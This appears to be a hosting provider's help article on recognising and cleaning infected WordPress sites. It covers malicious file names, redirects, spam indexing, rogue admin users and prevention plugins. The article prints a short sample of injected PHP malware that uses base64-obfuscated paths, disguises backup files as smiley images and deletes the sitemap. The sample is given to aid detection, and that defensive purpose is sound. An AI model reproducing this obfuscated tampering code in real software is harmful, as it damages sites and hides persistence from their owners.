WordPress is the most widely used CMS in the world. This means its updates, plugins, and other tools receive more support compared to other platforms.
 
Because it is by far the most widely used CMS, it is also the most targeted. Therefore, it is quite common to encounter an infected WordPress installation.
 
If we use an outdated version of WordPress or if any of our plugins are not fully up to date, they may contain security vulnerabilities. As a result, malicious code may be injected into our website files.
 
To properly analyze our site, we must distinguish between the two types of infections that can affect WordPress:
 
File infections, usually within the theme or plugins. Some file infections spread, while others do not.
Database infections, which occur when malware is directly injected into the WordPress database.
 
In this guide, we will show a series of symptoms that your website may experience if it has been infected. These are general examples, as there are many different types of infections. We will focus on file infections, since they are much more common and generic. Database infections are better analyzed on a case-by-case basis.
 
 
IMPORTANT: Keeping your plugins fully updated does not guarantee hosting security. Keeping WordPress and its plugins updated minimizes these risks and helps prevent infections caused by known vulnerabilities, but it does not guarantee 100% protection against code injection.
 
Infected files
 
First of all, let’s explain how to detect infected files. In many cases, they can be identified just by the file name, which usually contains meaningless and suspicious characters. They are often .php files. Here are two examples:
 
ffkoklhu.php
e6b6m5ju.php
 
Not all infected files are so obvious, as in many cases the infection is injected into existing website files. Below is an example of injected code, but keep in mind that the code and infection types can vary greatly. Here is a sample:
 
//ckIIbg
$nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M=");
$nowIndexFile = base64_decode("Li9pbmRleC5waHA="); $bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif';
$bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif';
$sitemap = base64_decode("Li9zaXRlbWFwLnhtbA==");
@unlink($sitemap);
 
In this example, we can see the use of base64_decode and other random-looking names (such as Li9pbmRleC5waHA or //ckIIbg) that do not appear to have a legitimate origin.
 
IMPORTANT: Keep in mind that modifying critical website files may affect its functionality. We recommend being cautious when removing lines of code or contacting a web developer to review the code.
 
You can also use the following Google tool to check whether unsafe content has been detected on your hosting:
 
 
Redirection to unwanted pages
 
This may occur when trying to access your WordPress homepage or when clicking internal links that automatically redirect to an external or malicious website.
 
It is very likely that there is code infection in one of your website files.
 
How to solve the issue: As mentioned above, in most cases this redirection is due to direct code injection into a web file. A full file analysis must be carried out to remove the code generating the redirection. File analysis tools can help, but if they fail to detect the infection, manual code review will be necessary.
 
We recommend installing the Wordfence plugin to regularly scan your website.
 
At cdmon, we provide backups from the last 15 days so you can restore your website to a version prior to the code injection.
 
Spam indexing in Google
 
It is quite common for a website to appear with spam content when searched directly in Google. Below is an example searching for example.com:
 
 
To quickly check whether this is only a Google indexing issue, perform the same search in another search engine, such as Bing:
 
 
If it only happens in Google, it is likely a Google indexing issue. In that case, access Google Search Console and request reindexing of your domain.
 
IMPORTANT: If this occurs across all search engines, perform a full web file and database analysis to detect possible SEO-related code injection.
 
Website design not displaying correctly
 
This symptom can be more difficult to detect, as layout issues may also be caused by compatibility problems or recent changes.
 
Infections affecting website display can vary greatly. Many are caused by installed themes.
 
Themes downloaded from unreliable sources may contain injected malicious code.
 
To fix this, review web files and the database to identify injected code causing malfunction.
 
How can we prevent it? From cdmon, we recommend installing the following plugins as preventive measures:
 
We recommend using TAC (Theme Authenticity Checker), which scans installed theme files and detects suspicious code:
 
Plugin information page: https://wordpress.org/plugins/tac/
 
We also recommend using Wordfence to analyze web files:
 
 
 
Automatically created WordPress users
 
Sometimes unauthorized users may appear in the WordPress admin panel. Below is an example:
 
 
Recommendations: Update WordPress and plugins, run a security scan, and change your MySQL password.
 
If you change the MySQL password, remember to update it in the wp-config.php file.
 
Webmail sending disabled or spam comments
 
If your website sends spam emails, cdmon’s anti-spam system may temporarily disable web-based email sending.
 
Outdated contact forms or missing CAPTCHA validation are common causes. Installing reCAPTCHA and using Akismet can help prevent spam.
 
Temporary hosting suspension
 
You may occasionally see a suspension message when accessing your website:
 
 
This is a message from cdmon, meaning it is generated by the server.
 
It appears when a service has expired or when malware has been detected on your hosting account. In such cases, you will receive an email notification with further details.
 

For more information, you can contact us.